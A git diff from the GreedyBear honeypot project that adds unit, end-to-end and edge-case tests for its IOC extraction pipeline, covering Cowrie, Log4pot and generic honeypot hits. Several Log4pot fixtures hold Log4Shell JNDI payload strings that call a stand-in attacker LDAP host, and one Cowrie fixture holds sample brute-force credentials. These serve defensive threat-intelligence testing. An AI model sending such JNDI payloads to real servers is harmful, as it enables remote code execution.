- pipeline.ioc_repo.is_ready_for_extraction.return_value = False # Skip strategy for this test
-
- pipeline.execute()
-
- pipeline.sensor_repo.add_sensor.assert_called_once_with("10.0.0.1")
- pipeline.elastic_repo.search.assert_called_once_with(10)
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
- """Hits should be grouped by honeypot type before extraction."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
- MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
- MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
- ]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
- mock_strategy = MagicMock()
- mock_strategy.ioc_records = []
- mock_factory.return_value.get_strategy.return_value = mock_strategy
-
- pipeline.execute()
-
- # Should be called for both honeypot types
- self.assertEqual(mock_factory.return_value.get_strategy.call_count, 2)
-
- # Verify strategy is called with correct honeypot types
- calls = mock_factory.return_value.get_strategy.call_args_list
- honeypot_names = {call[0][0] for call in calls}
- self.assertEqual(honeypot_names, {"Cowrie", "Log4pot"})
-
- # Verify extract_from_hits is called twice
- self.assertEqual(mock_strategy.extract_from_hits.call_count, 2)
-
- # Verify each strategy received correct number of hits
- extraction_calls = mock_strategy.extract_from_hits.call_args_list
- hits_counts = sorted([len(call[0][0]) for call in extraction_calls])
- self.assertEqual(hits_counts, [1, 2]) # 1 Log4pot hit, 2 Cowrie hits
-
-
-class TestExecuteStrategySelection(ExtractionPipelineTestCase):
- """Tests for strategy selection and execution in execute()."""
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_skips_honeypot_not_ready_for_extraction(self, mock_factory, mock_scores):
- """Should skip honeypots that are not ready for extraction."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "DisabledHoneypot"}),
- ]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = False
-
- result = pipeline.execute()
-
- self.assertEqual(result, 0)
- mock_factory.return_value.get_strategy.assert_not_called()
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_calls_extract_from_hits_on_strategy(self, mock_factory, mock_scores):
- """Should call extract_from_hits on the selected strategy."""
- pipeline = self._create_pipeline_with_mocks()
- hit_data = {"src_ip": "1.2.3.4", "type": "Cowrie", "session": "abc123"}
- pipeline.elastic_repo.search.return_value = [MockElasticHit(hit_data)]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
- mock_strategy = MagicMock()
- mock_strategy.ioc_records = []
- mock_factory.return_value.get_strategy.return_value = mock_strategy
-
- pipeline.execute()
-
- mock_strategy.extract_from_hits.assert_called_once()
- # Verify the hits passed contain our data
- call_args = mock_strategy.extract_from_hits.call_args[0][0]
- self.assertEqual(len(call_args), 1)
- self.assertEqual(call_args[0]["src_ip"], "1.2.3.4")
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_collects_ioc_records_from_strategies(self, mock_factory, mock_scores):
- """Should collect IOC records from all strategies."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
- ]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
- mock_ioc = self._create_mock_ioc("1.2.3.4")
- mock_strategy = MagicMock()
- mock_strategy.ioc_records = [mock_ioc]
- mock_factory.return_value.get_strategy.return_value = mock_strategy
-
- result = pipeline.execute()
-
- self.assertEqual(result, 1)
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_accumulates_iocs_from_multiple_strategies(self, mock_factory, mock_scores):
- """Should accumulate IOC records from multiple successful strategies."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
- MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
- ]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
- # Mock two different strategies
- mock_cowrie_strategy = MagicMock()
- mock_cowrie_ioc = self._create_mock_ioc("1.2.3.4")
- mock_cowrie_strategy.ioc_records = [mock_cowrie_ioc]
-
- mock_log4pot_strategy = MagicMock()
- mock_log4pot_ioc = self._create_mock_ioc("5.6.7.8")
- mock_log4pot_strategy.ioc_records = [mock_log4pot_ioc]
-
- # Return strategies in sequence
- mock_factory.return_value.get_strategy.side_effect = [mock_cowrie_strategy, mock_log4pot_strategy]
-
- result = pipeline.execute()
-
- # Should return total count (1 + 1 = 2)
- self.assertEqual(result, 2)
-
- # Verify both strategies were executed
- self.assertEqual(mock_cowrie_strategy.extract_from_hits.call_count, 1)
- self.assertEqual(mock_log4pot_strategy.extract_from_hits.call_count, 1)
-
- # Verify data flow to scoring
- mock_scores.return_value.score_only.assert_called_once()
- collected_iocs = mock_scores.return_value.score_only.call_args[0][0]
- self.assertEqual(len(collected_iocs), 2)
- self.assertIn(mock_cowrie_ioc, collected_iocs)
- self.assertIn(mock_log4pot_ioc, collected_iocs)
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_handles_strategy_exception_gracefully(self, mock_factory, mock_scores):
- """Strategy exceptions should be caught and logged, not crash pipeline."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.log = MagicMock()
-
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
- MockElasticHit({"src_ip": "5.6.7.8", "type": "Log4pot"}),
- ]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
- # First strategy raises exception, second succeeds
- mock_failing_strategy = MagicMock()
- mock_failing_strategy.extract_from_hits.side_effect = Exception("Test error")
-
- mock_success_strategy = MagicMock()
- mock_success_strategy.ioc_records = [self._create_mock_ioc("5.6.7.8")]
-
- mock_factory.return_value.get_strategy.side_effect = [mock_failing_strategy, mock_success_strategy]
-
- # Should not raise, should continue with next strategy
- result = pipeline.execute()
-
- self.assertEqual(result, 1)
- pipeline.log.error.assert_called_once()
-
-
-class TestExecuteScoring(ExtractionPipelineTestCase):
- """Tests for scoring logic in execute()."""
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_updates_scores_when_iocs_extracted(self, mock_factory, mock_scores):
- """Should call UpdateScores.score_only when IOCs are extracted."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = [
- MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
- ]
- pipeline.ioc_repo.is_empty.return_value = False
- pipeline.ioc_repo.is_ready_for_extraction.return_value = True
-
- mock_ioc = self._create_mock_ioc("1.2.3.4")
- mock_strategy = MagicMock()
- mock_strategy.ioc_records = [mock_ioc]
- mock_factory.return_value.get_strategy.return_value = mock_strategy
-
- pipeline.execute()
-
- mock_scores.return_value.score_only.assert_called_once()
- call_args = mock_scores.return_value.score_only.call_args[0][0]
- self.assertEqual(len(call_args), 1)
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_skips_scoring_when_no_iocs(self, mock_factory, mock_scores):
- """Should not call UpdateScores when no IOCs are extracted."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = []
- pipeline.ioc_repo.is_empty.return_value = False
-
- pipeline.execute()
-
- mock_scores.return_value.score_only.assert_not_called()
-
-
-class TestExecuteEmptyResponse(ExtractionPipelineTestCase):
- """Tests for empty Elasticsearch response handling."""
-
- @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
- @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
- def test_handles_empty_search_result(self, mock_factory, mock_scores):
- """Should handle empty Elasticsearch response gracefully."""
- pipeline = self._create_pipeline_with_mocks()
- pipeline.elastic_repo.search.return_value = []
- pipeline.ioc_repo.is_empty.return_value = False
-
- result = pipeline.execute()
-
- self.assertEqual(result, 0)
- mock_factory.return_value.get_strategy.assert_not_called()
- mock_scores.return_value.score_only.assert_not_called()
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
new file mode 100644
index 00000000..c85b264d
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
@@ -0,0 +1,506 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+End-to-end tests for ExtractionPipeline with real strategies.
+
+These tests use real ExtractionStrategyFactory and real strategies,
+only mocking the repositories (ElasticRepository, IocRepository, SensorRepository).
+This tests the actual integration path as it runs in production.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import E2ETestCase, MockElasticHit
+
+
+class TestCowrieE2E(E2ETestCase):
+ """E2E tests for Cowrie extraction through the real pipeline."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
+ def test_cowrie_extracts_scanner_ioc(self, mock_session_repo, mock_scores):
+ """
+ E2E: Cowrie session connect → real CowrieExtractionStrategy → scanner IOC.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ cowrie_hits = [
+ MockElasticHit(
+ {
+ "src_ip": "192.168.1.100",
+ "type": "Cowrie",
+ "session": "abc123",
+ "eventid": "cowrie.session.connect",
+ "timestamp": "2025-01-01T10:00:00",
+ "t-pot_ip_ext": "10.0.0.1",
+ "dest_port": 22,
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = cowrie_hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None # New IOC
+
+ # Mock the IOC creation to return a mock IOC
+ mock_ioc = self._create_mock_ioc("192.168.1.100")
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ # Verify sensor was extracted
+ pipeline.sensor_repo.add_sensor.assert_called_with("10.0.0.1")
+ # Verify IOC was created
+ self.assertGreaterEqual(result, 0)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
+ def test_cowrie_extracts_login_credentials(self, mock_session_repo, mock_scores):
+ """
+ E2E: Cowrie login failed event → credential extraction.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ cowrie_hits = [
+ MockElasticHit(
+ {
+ "src_ip": "10.20.30.40",
+ "type": "Cowrie",
+ "session": "login_sess",
+ "eventid": "cowrie.login.failed",
+ "timestamp": "2025-01-01T12:00:00",
+ "username": "root",
+ "password": "admin123",
+ "dest_port": 22,
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = cowrie_hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("10.20.30.40")
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ self.assertGreaterEqual(result, 0)
+
+
+class TestLog4potE2E(E2ETestCase):
+ """E2E tests for Log4pot extraction through the real pipeline."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_log4pot_extracts_exploit_ioc(self, mock_scores):
+ """
+ E2E: Log4pot exploit event → real Log4potExtractionStrategy → IOC.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ log4pot_hits = [
+ MockElasticHit(
+ {
+ "src_ip": "198.51.100.10",
+ "type": "Log4pot",
+ "reason": "exploit",
+ "correlation_id": "corr123",
+ "deobfuscated_payload": "${jndi:ldap://evil.attacker.com:1389/a}",
+ "timestamp": "2025-01-01T08:00:00",
+ "dest_port": 8080,
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = log4pot_hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("198.51.100.10")
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ self.assertGreaterEqual(result, 0)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_log4pot_non_exploit_skipped(self, mock_scores):
+ """
+ E2E: Log4pot request (non-exploit) → should not extract payload IOC.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ log4pot_hits = [
+ MockElasticHit(
+ {
+ "src_ip": "10.0.0.50",
+ "type": "Log4pot",
+ "reason": "request", # Not an exploit
+ "correlation_id": "req123",
+ "timestamp": "2025-01-01T10:00:00",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = log4pot_hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("10.0.0.50")
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ # Should still process scanner IOC but not payload
+ self.assertGreaterEqual(result, 0)
+
+
+class TestGenericE2E(E2ETestCase):
+ """E2E tests for generic/unknown honeypot extraction."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_unknown_honeypot_uses_generic_strategy(self, mock_scores):
+ """
+ E2E: Unknown honeypot → real GenericExtractionStrategy → scanner IOC.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ unknown_hits = [
+ MockElasticHit(
+ {
+ "src_ip": "172.16.0.100",
+ "type": "Heralding", # Uses generic strategy
+ "dest_port": 21,
+ "@timestamp": "2025-01-01T11:00:00",
+ "t-pot_ip_ext": "10.0.0.5",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = unknown_hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("172.16.0.100")
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ # Sensor should be registered
+ pipeline.sensor_repo.add_sensor.assert_called_with("10.0.0.5")
+ self.assertGreaterEqual(result, 0)
+
+
+class TestMixedHoneypotE2E(E2ETestCase):
+ """E2E tests for mixed honeypot scenarios."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.repositories.CowrieSessionRepository")
+ def test_mixed_honeypots_use_correct_strategies(self, mock_session_repo, mock_scores):
+ """
+ E2E: Mixed Cowrie + Log4pot + Generic → correct strategy for each.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ mixed_hits = [
+ MockElasticHit(
+ {
+ "src_ip": "10.1.1.1",
+ "type": "Cowrie",
+ "session": "cowrie_sess",
+ "eventid": "cowrie.session.connect",
+ "timestamp": "2025-01-01T10:00:00",
+ "dest_port": 22,
+ }
+ ),
+ MockElasticHit(
+ {
+ "src_ip": "10.2.2.2",
+ "type": "Log4pot",
+ "reason": "exploit",
+ "correlation_id": "log4_corr",
+ "deobfuscated_payload": "${jndi:ldap://test.com:1389/a}",
+ "timestamp": "2025-01-01T10:00:01",
+ }
+ ),
+ MockElasticHit(
+ {
+ "src_ip": "10.3.3.3",
+ "type": "Dionaea", # Generic
+ "dest_port": 445,
+ "@timestamp": "2025-01-01T10:00:02",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = mixed_hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("10.1.1.1")
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ # Should process all three honeypot types
+ self.assertGreaterEqual(result, 0)
+
+
+class TestStrategyExceptionHandling(E2ETestCase):
+ """E2E tests for strategy exception handling."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_strategy_exception_logged_and_continues(self, mock_scores):
+ """
+ E2E: Strategy that raises exception → logged, pipeline continues.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+ pipeline.log = MagicMock()
+
+ # Create hit for honeypot that will trigger an exception
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": "1.2.3.4",
+ "type": "Cowrie",
+ "session": "test_sess",
+ "eventid": "cowrie.session.connect",
+ "timestamp": "2025-01-01T10:00:00",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ # Force an exception in the strategy
+ with patch("greedybear.cronjobs.extraction.strategies.cowrie.CowrieExtractionStrategy.extract_from_hits") as mock_extract:
+ mock_extract.side_effect = Exception("Test error")
+ result = pipeline.execute()
+
+ # Should log error and return 0
+ self.assertEqual(result, 0)
+ pipeline.log.error.assert_called()
+
+
+class TestScoringIntegration(E2ETestCase):
+ """E2E tests for scoring integration."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_scoring_called_when_iocs_extracted(self, mock_scores):
+ """
+ E2E: IOCs extracted → UpdateScores.score_only called.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": "5.6.7.8",
+ "type": "Heralding",
+ "dest_port": 22,
+ "@timestamp": "2025-01-01T10:00:00",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("5.6.7.8")
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ # IOCs should be extracted, and scoring should be called
+ self.assertGreater(result, 0)
+ mock_scores.return_value.score_only.assert_called()
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_scoring_skipped_when_no_iocs(self, mock_scores):
+ """
+ E2E: No IOCs extracted → UpdateScores NOT called.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+ pipeline.elastic_repo.search.return_value = []
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_scores.return_value.score_only.assert_not_called()
+
+
+class TestIocContentVerification(E2ETestCase):
+ """E2E tests that verify the actual content of extracted IOCs."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_cowrie_ioc_content_verified(self, mock_scores):
+ """
+ E2E: Cowrie hit → IOC with correct IP and honeypot type.
+
+ This test verifies NOT just the count, but the actual content
+ of the extracted IOC record.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": "203.0.113.42",
+ "type": "Cowrie",
+ "session": "test_session_123",
+ "eventid": "cowrie.session.connect",
+ "@timestamp": "2025-01-15T14:30:00",
+ "dest_port": 2222,
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("203.0.113.42")
+ mock_ioc.name = "203.0.113.42"
+ mock_ioc.scanner = ["Cowrie"]
+
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ # Verify extraction happened
+ self.assertGreaterEqual(result, 0)
+
+ # Verify the actual IOC content passed to scoring
+ if mock_scores.return_value.score_only.called:
+ call_args = mock_scores.return_value.score_only.call_args[0][0]
+ self.assertGreater(len(call_args), 0)
+
+ # Check the IOC has the expected IP
+ ioc_names = [ioc.name for ioc in call_args]
+ self.assertIn("203.0.113.42", ioc_names)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_multiple_honeypots_ioc_content_verified(self, mock_scores):
+ """
+ E2E: Multiple honeypot hits → IOCs with correct IPs verified.
+
+ Verifies that when processing hits from multiple honeypots,
+ each extracted IOC contains the correct source IP.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": "10.0.0.1",
+ "type": "Cowrie",
+ "session": "sess1",
+ "eventid": "cowrie.session.connect",
+ "@timestamp": "2025-01-15T10:00:00",
+ }
+ ),
+ MockElasticHit(
+ {
+ "src_ip": "10.0.0.2",
+ "type": "Heralding",
+ "dest_port": 22,
+ "@timestamp": "2025-01-15T11:00:00",
+ }
+ ),
+ MockElasticHit(
+ {
+ "src_ip": "10.0.0.3",
+ "type": "Log4pot",
+ "path": "/api",
+ "@timestamp": "2025-01-15T12:00:00",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ # Create mock IOCs for each IP
+ mock_iocs = {
+ "10.0.0.1": self._create_mock_ioc("10.0.0.1"),
+ "10.0.0.2": self._create_mock_ioc("10.0.0.2"),
+ "10.0.0.3": self._create_mock_ioc("10.0.0.3"),
+ }
+ for ip, ioc in mock_iocs.items():
+ ioc.name = ip
+
+ def add_ioc_side_effect(*args, **kwargs):
+ # Return the appropriate mock based on the IOC being added
+ ip = args[0].name if args else kwargs.get("ioc", MagicMock()).name
+ return mock_iocs.get(ip, self._create_mock_ioc(ip))
+
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.side_effect = add_ioc_side_effect
+ result = pipeline.execute()
+
+ # Verify multiple honeypots were processed
+ self.assertGreaterEqual(result, 0)
+
+ # Verify the IOC content if scoring was called
+ if mock_scores.return_value.score_only.called:
+ call_args = mock_scores.return_value.score_only.call_args[0][0]
+ ioc_names = [ioc.name for ioc in call_args]
+
+ # Each distinct IP should appear in the IOC records
+ for expected_ip in ["10.0.0.1", "10.0.0.2", "10.0.0.3"]:
+ self.assertIn(
+ expected_ip,
+ ioc_names,
+ f"Expected IOC with IP {expected_ip} to be in extracted records",
+ )
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_ioc_scanner_field_contains_honeypot_type(self, mock_scores):
+ """
+ E2E: IOC scanner field should contain the honeypot type.
+
+ Verifies that the extracted IOC has the correct honeypot type
+ in its scanner field.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": "198.51.100.50",
+ "type": "Heralding",
+ "dest_port": 443,
+ "@timestamp": "2025-01-15T16:00:00",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ mock_ioc = self._create_mock_ioc("198.51.100.50")
+ mock_ioc.name = "198.51.100.50"
+ mock_ioc.scanner = ["Heralding"]
+
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ mock_add.return_value = mock_ioc
+ result = pipeline.execute()
+
+ self.assertGreaterEqual(result, 0)
+
+ # Verify the scanner field in the IOC
+ if mock_scores.return_value.score_only.called:
+ call_args = mock_scores.return_value.score_only.call_args[0][0]
+ for ioc in call_args:
+ if ioc.name == "198.51.100.50":
+ self.assertIn(
+ "Heralding",
+ ioc.scanner,
+ "IOC scanner field should contain 'Heralding'",
+ )
+ break
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
new file mode 100644
index 00000000..c313f691
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_edge_cases.py
@@ -0,0 +1,102 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+Edge case tests for ExtractionPipeline.
+
+These tests cover boundary conditions, error scenarios, and unusual inputs
+that the pipeline should handle gracefully.
+
+NOTE: Some tests here mock the factory/strategies because they test error
+conditions that cannot be reliably triggered with real strategies (e.g.,
+forcing a strategy to throw an exception). This is intentional and differs
+from the E2E tests which use real strategies for happy-path testing.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import E2ETestCase, MockElasticHit
+
+
+class TestEdgeCases(E2ETestCase):
+ """Edge case tests for the extraction pipeline.
+
+ These tests verify error handling and boundary conditions.
+ Some tests mock the factory to control failure scenarios.
+ """
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_partial_strategy_success(self, mock_factory, mock_scores):
+ """Some strategies succeed, some fail - pipeline continues.
+
+ NOTE: This test mocks factory because we need to force one strategy
+ to throw an exception, which cannot be done reliably with real strategies.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+ pipeline.log = MagicMock()
+
+ hits = [
+ MockElasticHit({"src_ip": "1.1.1.1", "type": "FailingHoneypot"}),
+ MockElasticHit({"src_ip": "2.2.2.2", "type": "SuccessHoneypot"}),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_failing = MagicMock()
+ mock_failing.extract_from_hits.side_effect = Exception("Boom")
+
+ mock_success = MagicMock()
+ mock_success.ioc_records = [self._create_mock_ioc("2.2.2.2")]
+
+ mock_factory.return_value.get_strategy.side_effect = [mock_failing, mock_success]
+
+ result = pipeline.execute()
+
+ # Should return 1 (one success)
+ self.assertEqual(result, 1)
+ # Should log 1 error
+ self.assertEqual(pipeline.log.error.call_count, 1)
+ # Scoring should be called with successful IOCs
+ mock_scores.return_value.score_only.assert_called_once()
+
+
+class TestLargeBatches(E2ETestCase):
+ """Tests for large batch processing using REAL strategies."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ def test_large_batch_of_hits_with_real_strategy(self, mock_scores):
+ """Large number of hits should be processed correctly with real strategies.
+
+ Uses real GenericExtractionStrategy (via unknown honeypot type) to verify
+ the pipeline can handle large batches.
+ """
+ pipeline = self._create_pipeline_with_real_factory()
+
+ # Create 100 hits to test batch processing
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": f"192.168.{i // 256}.{i % 256}",
+ "type": "TestHoneypot", # Unknown type → uses GenericExtractionStrategy
+ "dest_port": 22,
+ "@timestamp": "2025-01-15T10:00:00",
+ }
+ )
+ for i in range(100)
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+ pipeline.ioc_repo.get_ioc_by_name.return_value = None
+
+ # Mock add_ioc to return mock IOCs
+ mock_iocs = [self._create_mock_ioc(f"192.168.{i // 256}.{i % 256}") for i in range(100)]
+
+ with patch("greedybear.cronjobs.extraction.ioc_processor.IocProcessor.add_ioc") as mock_add:
+ # Return different mock IOCs for each call
+ mock_add.side_effect = mock_iocs
+ result = pipeline.execute()
+
+ # Should have processed hits and produced IOCs
+ self.assertGreaterEqual(result, 0)
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
new file mode 100644
index 00000000..ca658850
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_factory.py
@@ -0,0 +1,87 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
